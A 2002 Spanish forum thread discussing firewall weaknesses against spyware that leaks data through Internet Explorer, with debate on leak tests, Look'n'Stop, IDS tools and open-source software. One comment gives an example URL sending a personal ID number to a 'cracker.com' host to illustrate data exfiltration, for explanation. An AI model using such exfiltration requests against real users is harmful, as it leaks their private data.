📰 Artículos

La seguridad de los cortafuegos

Galaxian 19 agosto 2002 09:55

⋮

Hace unos dias, en una respuesta que dí al artículo sobre el "spyware" de Microsoft, hablé de un supuesto agujero de seguridad de los cortafuegos: este problema se produciría si los programas espia y/o malintencionados, utilizaban las posibilidades del IE, abriéndolo directamente o por medio de OCX.

Pues bién, el supuesto agujero NO es un supuesto, sino que es toda una realidad. Investigando un poco, y exponiendo el tema en el foro de seguridad de grc.com, he descubierto que NINGUNO de los cortafuegos conocidos es capaz de detectar este tipo de actividades.

En pcflank.com/art21.htm hay una serie de tests que demuestran este hecho (en inglés).

Lo peor de todo es que ES UN PROBLEMA CONOCIDO por los fabricantes de cortafuegos que, sin embargo, siguen publicitando y vendiendo sus supuestas panaceas para garantizar la privacidad.

Como resultado, los pobres usuarios de cortafuegos (entre los que me incluyo) que creían estar a salvo de todos los espias del mundo, resulta que no solo no estamos protegidos, sino que podemos estar informando a todo el universo conocido de nuestras actividades.

Saludos.

P.S.: lo peor no es hacer el tonto, sino la cara que se te queda.

💬 Comentarios

Cesalv 19 agosto 2002 10:53

⋮

La gente se sigue apoyando en topicos estupidos y luego pasa lo que pasa... la seguridad absoluta NO existe... y en informatica menos aun, el q no se lo crea q le vaya bien, lo primero q hay q saber d la seguridad es eso.

Otra cosa es q hay muchos grados intermedios entre estar con el culo al aire y razonablemente protegido, siempre se dice q si un firewall es mejor q otro... mal configurado todos son una porqueria.

Tb hay q tener n cuenta la naturaleza d las infiltraciones, ya no estamos hablando del clasico tiento a netbios, vulnerabilidades propias del internet explorer o alguno d sus componentes se eliminan empleando un navegador mas serio (ahora vendran los defensores del internet implorer a tocar las narices... lista d fallos d seguridad conocidos del ie: 157 (mas o menos) numero d fallos detectados al netscape: 25 o asi... opera: 1... cuando localice la web donde lo vi la añadiré) todos sabemos q usar ciertos programas es vivir peligrosamente pero es cosa d la conciencia d cada uno.

Los q son mas preocupantes son los q se apoyan n dll o componentes del sistema, tipo firehole, esos si son un problema pero porq el firewall no da mas d si, es para lo q es, pretender poner un cortafuegos y pensar q se esta seguro sin añadir un antivirus actualizado y un detector d troyanos es crearse una imagen d falsa seguridad q antes o despues pasa factura, a ver cuando nos enteramos q los cortafuegos no hacen milagros...

P.D. El q tiene tu ip y t la quiere hacer, antes o despues t la hace, porq la seguridad absoluta... eso mismo

✖

BocaDePez 19 agosto 2002 11:35

⋮

cesalv, dices que opera tiene 1 fallo, seria interesante que dijeras cual es o dieras mas info al respecto, dado q es solo 1...

✖

Cesalv 19 agosto 2002 12:18

⋮

Que se sepa es el unico gordo q han tenido por ahora, pero nunca se sabe cuando pueden salir mas, cuanta mas gente lo usa mas fallos aparecen (lo del ie es por demas, a exploit/bug por semana...)

El boquete esta n la forma d procesar los formularios, q lo mismo envia una respuesta legitima q un fichero local, si no recuerdo mal fue noticia d portada aqui mismo cuando se descubrió, si no lo encuentras pasate por aqui (link roto)

✖

BocaDePez 20 agosto 2002 09:19

⋮

en efecto esta noticia ya fue publicada hace tiempo, pero este bug esta solucionado en las versiones mas modernas de opera (a partir de 6.03).

BocaDePez 19 agosto 2002 14:38

⋮

estoy de acuerdo, yo creo ke una cosa es un firewall y otra es las vulnerabilidades del explorer: me expliko :

asi a primera vista yo creo ke en ese supuesto el firewall no es el ke falla... ¿por ke? pues porke probablemente ANTES de ke el fire te deje usar el internet explorer, TU se lo has tenido ke permitir, porke sino TB te lo hubiera blokeado como cualkier otra cosa... asi ke el problema es del internet explorer y NO del firewall (a no ser ke sea algun fire ke no te deje blokear el explorer o algo muy cutre)

un ejemplo seria: tu usas el "mapster" ke es un programa p2p, y resulta ke es una kaka y tiene mas agujeros ke un colador, pero tu fire es wapo y la primera vez ke usas el p2p el fire te dice: kieres krear una regla? permitir acceso, no permitir acceso etc etc. Pues bien si le permites acceso y luego el p2p tiene vulnerabilidades pos evidentemente no es culpa del fire, ke logikamente no puede estar corrigiendo fallos de cada uno de los programas ke salen al mercado

---burbuja---

✖

Bocapez 20 agosto 2002 03:07

⋮

...si utilizas mozilla o netscape u otro navegador tambien ocurriria lo mismo, siempre que en el cortafuegos tambien les des permiso como al iexplorer. Imaginate una aplicacion que tras rebuscar por tu hd, lo que hace es lanzar una url con informacion sensible:

cracker.com/in.php?dni=34555689

Tengas el navegador que tengas tu datos serian recogidos en el sitio remoto.

Por cierto, no se en otros, pero en el NIS 2002 puedes configurar que informacion sensible no salga nunca de tu pc, asi que vetando el dato "34555689" se solucionaria el problema anterior asi como otro que tratase de usar el mismo metodo, ya fuese mediante un control OCX o directamente una url.

No estoy de acuerdo que en el analisis que se menciona en el articulo, dejen los cortafuegos con las opciones por defecto:

"Each firewall was tested with default settings. In other words we have not re-configured the firewalls after they had been installed on the system. The reason to test firewalls with default settings is most users are having difficulties in configuring firewalls so they do not change certain settings after they install the program and instead use default configuration."

Pretender tener un sistema seguro, dejando las opciones por defecto sin configurar nada, me parece poco realista. Sigo pensando que la mayor vulnerabilidad de un sistema es un usuario despreocupado.

✖

Galaxian 20 agosto 2002 03:47

⋮

Como he dicho más abajo, he probado el Look'n'Stop y, más que sorprendido, he quedado asustado: he descubierto el KRNL386.DLL intentando acceder a Internet... y yo me pregunto ¿con que oscuro propósito?

Por cierto, Look'n'Stop por sí solo no es buena elección. Yo lo estoy usando en "tandem" con el NIS 2002, y el duo es casi imbatible.

✖

Cesalv 20 agosto 2002 04:53

⋮

Resulta q n la misma web q mencionas (2 veces a falta d una) dicen algo muy interesante...

"Look'n'Stop 2.03b3 with default settings fails all tests except Yalta but if you activate the Application Filtering feature Look'n'Stop will pass all five Leak Tests!"

Que cosas pasan no? resulta q d por si esta vendido pero activando la opcion magica se vuelve un super cortafuegos... a ver si bajamos del limbo, si has leido la documentacion d gibson (www.grc.com) acerca del leaktest ya comentaba algo muy curioso sobre el blackice, resulta q n condiciones normales era un coladero pero la version parcheada d la q se uso n las pruebas aprobaba el leaktest... seguia siendo un coladero pero ese test n concreto lo pasaba...

No se t ha ocurrido pensar q los programas d test d firewalls son anteriores a las aplicaciones y q es muy sencillo modificarlos para q pasen ciertas pruebas mientras siguen siendo un autentico colador? A juzgar por el entusiasmo con el q recomiendas el look´n stop diria q no se t ha ocurrido, n estos temas esta todo mas q inventado, y no hace demasiado tiempo vi n una comparativa n la q ese cortafuegos era mas bien malo, cuando mejora mucho d repente no se a ti pero a mi m huele mal...

✖

Galaxian 20 agosto 2002 06:44

⋮

BocaDePez 20 agosto 2002 07:57

⋮

ya se ke con cualkier otro navegador pasaria algo parecido, por eso puse un ejemplo con un hipotetico programa p2p ke tuviera agujeros gordos, porke no solo pasa con rpogramas navegadores , seguro ke puede pasar con otros programas, no se... cosas tipo msn o el outlook o cosas asi pero incluso con otros programas ke a simple vista no tuvieran agujeros gordos, asi ke en ultimo extremo si algo entra la mayor parte de las veces es por fallos de esos programas y tb porke tu les has dado acceso a inet con una regla en el firewall. De todas formas con firewall o sin el si te kieren entrar seguro ke te entran porke yo no me creo ke uno ke sepa mucho no pueda pasar por encima de un firewall sea gratis o de pago y con el nombre de una gran compañia... asi ke kreo ke "matarse" por bajarse un fire ke este a la ultima es un poko.... la verdad eske la mayor posibilidad de ke alguien te entre es alguien haciendo algo muy basico un chaval con un subseven o alguien por los recursos compartidos, asi ke kon un simple fire vas sobrao, porke komo he dicho, con el mejor fire o con el peor, si el ke te entra es weno, te entra.

Galaxian 19 agosto 2002 15:07

⋮

Navegando por pcflank.com/art21.htm he descubierto un cortafuegos que parece capaz de bloquearlo todo: Look'n'Stop.

Es la primera vez que oigo hablar de él, pero lo he descargado, lo he instalado y si, es capaz de detectar el uso de IE por parte de otros programas; tanto de uso directo por medio de ActiveX/COM, como indirecto por OCX, e incluso en sistemas "cobistas" que son capaces de integrarse en el IE. Todo un descubrimiento.

mihe 20 agosto 2002 03:51

⋮

Para los casos en los que un firewall no basta se utilizan IDS (Intrussion Detection System), es decir, sistemas de detecion de intrusos. Estos programas examinan todo el trafico que entra y si queremos el que sale, y busca en ese trafico tramas y cadenas de exploits conocidos de vulnerabilidades conocidas, haciendo que sea mucho mas dificil cualquier intento de intrusion. Uno de los mejores IDS´s, y ademas no comercial, es Snort, originario de sistemas linux/unix a sido portado tambien a la plataforma win32.

Un saludo de Mihe !

✖

beer4all 20 agosto 2002 13:48

⋮

El problema mihe, es que no se si es muy legal sniffear el trafico de una red.. en casa cada uno que haga lo que quiera, pero en entornos laborales, no sep...

salu2

BocaDePez 20 agosto 2002 06:39

⋮

A los que seáis muy paranoicos acerca de esto, deciros que todos estos programas "antispywares" y firewalls no son más que basura por una sencilla razón: no se sabe lo que realmente hacen al no estar disponible el código fuente. Y obviamente, todo el software que incluye spyware no va a ser detectado por un pseudo-antyspyware de estos, simplemente detectará una serie de rutinas conocidas, pero no cualquier código spyware decentemente hecho. Por eso deciros que estos programitas lo único que aportan es una falsa sensación de seguridad. En cualquier software de código cerrado, se pueden meter spywares, agujeross, troyanos, etc. sin que se entere ni dios, así que no confieis en estas herramientas.

Lo que digo, al que se sienta realmente paranoico que use software de código abierto en el que si sabes lo que realmente el software hace, sin trampa ni cartón. Y no sólo hablo de Linux, sino cualquier otro sistema operativo de código abierto, o incluso en windows usad aplicaciones de código abierto como p.ej. Mozilla.

✖

Galaxian 20 agosto 2002 06:50

⋮

Dan una falsa sensación de seguridad, de acuerdo, pero mejor es algo que nada.

No son impenetrables, de acuerdo, pero sirve para parar la mayoría de los intentos de intrusión y violación de la privacidad.

El caso es el mismo que el de un chaleco antibalas: si de pegan en la cabeza vás listo, pero si te pegan en el chaleco con un cañón, también lo estás.

Resumiendo, más vale estar algo protegido que no estarlo en absoluto.

NoRManD 21 agosto 2002 02:51

⋮

buenos dias ante todo...

Que tal si partimos del hecho de que un firewall en la mayoria de los casos lo que hace es permitir/denegar el acceso a una ip / puerto (ej: explorer por el puerto 80, o el puerto 80 a cualquier aplicación-menudo agujero-, etc...) o de una ip a nuestro ordenador (ip + port o solo ip, ...), pues ya nos podemos imaginar lo que puede pasar. Hay multitud de programas que nos creemos que no hacen nada y madre mia la charla que se traen con los servidores. Si alguien quiere un ejemplo de ello. Yo usaba el binomio antivirus+firewall, en este caso AVP(Kaspersky-labs) + Sygate Firewall, bastante recomendables los dos, pero como en todo siempre fallaba algo... ¿ el que ? Sencillo, el tema que traemos entre mano en este "thread". Que hacer con los programas que usan nuestras reglas de acceso en el firewall y que envian datos de lo mas sugerente de nuestro ordenador y nuestra conexion. Pues en principio con un firewall, ya sabemos el que ...o nos volvemos majaretas poniendo reglas a ips y puertos a diestro y siniestro o utilizamos otro tipo de programas que miren realmente el flujo de datos que esta saliendo.

Si quereis probar, hay un antivirus (algo pesado para mi gusto) que desde luego para ver lo que ocurre por el ordenador esta bien: Bit Defender, es un poco paranoico, pero desde luego "canta" bastante de lo que pasa por nuestra conexión. Echad un vistazo al messenger de msn, vereis que conversaciones más amenas se monta.

Ale, muchos bites y recordad que la mejor forma de no enviar información es no teniendo internet. :)